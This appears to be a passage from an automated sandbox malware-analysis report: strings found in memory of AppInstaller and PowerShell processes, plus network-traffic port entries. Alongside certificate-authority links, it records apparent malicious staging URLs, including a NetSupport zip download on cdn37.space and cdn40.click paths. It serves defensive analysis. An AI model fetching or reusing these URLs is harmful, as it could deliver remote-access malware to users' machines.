Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.postsignum.cz/crl/psrootqca2.crl02
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.rcsc.lt/repository0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/cps/0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: AppInstaller.exe, 0000000E.00000002.1776167790.00000196D5FE2000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.ssc.lt/cps03
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/dpc0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.suscerte.gob.ve/lcr0#
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://www.symauth.com/cps0(
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: http://www.symauth.com/rpa00
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
Source: AppInstaller.exe, 0000000E.00000003.1679874554.00000196D5F80000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
Source: AppInstaller.exe, 0000000E.00000003.1680507889.00000196D5F68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
Source: AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: AppInstaller.exe, 0000000E.00000002.1766321527.00000196D5140000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp41
Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppP
Source: powershell.exe, 00000029.00000002.2535977313.000002678C620000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000017.00000002.2180463385.000001E11D001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B280001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161161000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678C66C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000001A.00000002.1968531120.0000023161D6B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162258000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1967121818.000002315F2F7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 0000001A.00000002.1968531120.000002316227F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp(
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp8
Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677515600.000002B5AB261000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F3F2000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C8C000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2100907317.00000177F3C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5300000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS80
Source: AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C8C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSClass
Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677515600.000002B5AB261000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSPM
Source: AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2100907317.00000177F3C62000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSapplication/msixbundleasimovrome.telemetryi
Source: AppInstaller.exe, 00000024.00000002.2594809898.000002A99F3F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOSbl
Source: chromecache_146.1.dr	String found in binary or memory: https://api.ipify.org?format=json
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn37.space.0.0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023161659000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn37.space/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4?aklshd
Source: powershell.exe, 0000001A.00000002.1968531120.000002316179B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023161650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn37.space/files/netsupport25.zip
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/223dc805-5605-4a0b-b828-cdad1b84126e-79d39c2c-0f10-48d1-9edf-c18a784efba0
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/73689d8a-25b4-41cf-b693-05591ed804a7-7433f7b1-9997-477b-aadc-5a6e8d233c61?fmtKxA
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/974afa0a-d334-48ec-a0d4-4cc14efa730c-1d3d044a-e654-41e3-ad32-38a2934393e4
Source: chromecache_146.1.dr	String found in binary or memory: https://cdn40.click/9e4e27b7-bcfb-4298-bf8f-2cf4a6bdb3bf-9b6b40d6-3f8e-4755-9063-562658ebdb95
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn40.click/bb9c1a14-4e3d-40ab-bcc8-0b84e78255b0-4bed9ff2-0f4e-48fb-92ed-1065fcd85e01
Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F99000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162FB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, PCICL32.DLL.26.dr, HTCTL32.DLL.26.dr, pcicapi.dll.26.dr, PCICHEK.DLL.26.dr, AudioCapture.dll.26.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000001A.00000002.1968531120.00000231613CA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester8
Source: powershell.exe, 00000017.00000002.2180463385.000001E11E1A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2814AE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000029.00000002.2535977313.000002678CC32000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: AppInstaller.exe, 0000000E.00000003.1690225713.00000196D59C8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1694980372.00000196D5C45000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1696809126.00000196D5C48000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695283306.00000196D5A8C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695365533.00000196D5B19000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1682881043.00000196D5A8B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1695210802.00000196D59CE000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1684574291.00000196D5997000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1772231898.00000196D5B22000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1683185279.00000196D5B18000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1694932844.00000196D5C47000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1688507189.00000196D5C3C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2153475118.000002A99FBC8000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2174777930.000002A99FE3E000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2656943644.000002A99FD22000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2172597262.000002A99FC8C000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2171518364.000002A99FBCE000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2130006171.000002A99FC7B000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2137618649.000002A99FBCA000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2134290511.000002A99FD21000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2119229019.000002A99FBCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://microsoft.sharepoint.com/teams/appxmanifest/SitePages/Home.aspx
Source: powershell.exe, 00000017.00000002.2398750900.000001E12D1B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2180463385.000001E11EA2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2398750900.000001E12D07C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2901D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2037069987.000002B2900A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.2149775477.00000231711D9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: AppInstaller.exe, 0000000E.00000003.1680572107.00000196D5F49000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1679907643.00000196D5F3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000017.00000002.2180463385.000001E11E621000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: AppInstaller.exe, 00000024.00000003.2183907074.000002A99FD14000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000003.2141059449.000002A99FE3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://osgwiki.com/wiki/Manifest_Request
Source: AppInstaller.exe, 0000000E.00000003.1687850749.00000196D5FBD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://repository.luxtrust.lu0
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.certicamara.com/marco-legal0Z
Source: AppInstallerFullTrustAppServiceClient.exe, 00000012.00000002.1677556637.000002B5AB27A000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2594809898.000002A99F399000.00000004.00000020.00020000.00000000.sdmp, AppInstallerFullTrustAppServiceClient.exe, 00000026.00000002.2102011848.00000177F3C7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ACTAS/789230
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
Source: AppInstaller.exe, 0000000E.00000003.1680481341.00000196D5F57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.anf.es/address/)1(0&
Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel
Source: AppInstaller.exe, 0000000E.00000003.1687786555.00000196D5F9B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.catcert.net/verarrel05
Source: AppInstaller.exe, 0000000E.00000002.1767669813.00000196D5373000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1747212433.00000196D51F1000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767105272.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5344000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1681976342.00000196D5346000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000003.1680323847.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 0000000E.00000002.1767561183.00000196D5361000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2521327476.000002A997C6F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2605920830.000002A99F543000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2589315974.000002A99F31F000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E5000.00000004.00000020.00020000.00000000.sdmp, AppInstaller.exe, 00000024.00000002.2612981471.000002A99F5E9000.00000004.00000020.00020000.00000000.sdmp, remcmdstub.exe.26.dr, APPX.a7eg2nv0h_5ll4mprtt9uojee.tmp.14.dr, APPX.u5y27yz6k3vi25fmvsudde2mb.tmp.14.dr, TCCTL32.DLL.26.dr	String found in binary or memory: https://www.globalsign.com/repository/0
Source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr	String found in binary or memory: https://www.globalsign.com/repository/03
Source: powershell.exe, 0000001A.00000002.1968531120.00000231633D6000.00000004.00000800.00020000.00000000.sdmp, remcmdstub.exe.26.dr	String found in binary or memory: https://www.globalsign.com/repository/06
Source: AppInstaller.exe, 0000000E.00000003.1680066554.00000196D5F5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.netlock.net/docs
Source: powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2062772287.000002B2F5E82000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1941634656.000002B2801BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wsj.com/
Source: powershell.exe, 00000019.00000002.2058406283.000002B2F5C65000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.wsj.com/vice
Source: powershell.exe, 00000019.00000002.1941634656.000002B280472000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wsj.com/x
Source: AppInstaller.exe, 0000000E.00000003.1687897389.00000196D5FCD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://wwww.certigna.fr/autorites/0m

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49680 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49676 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
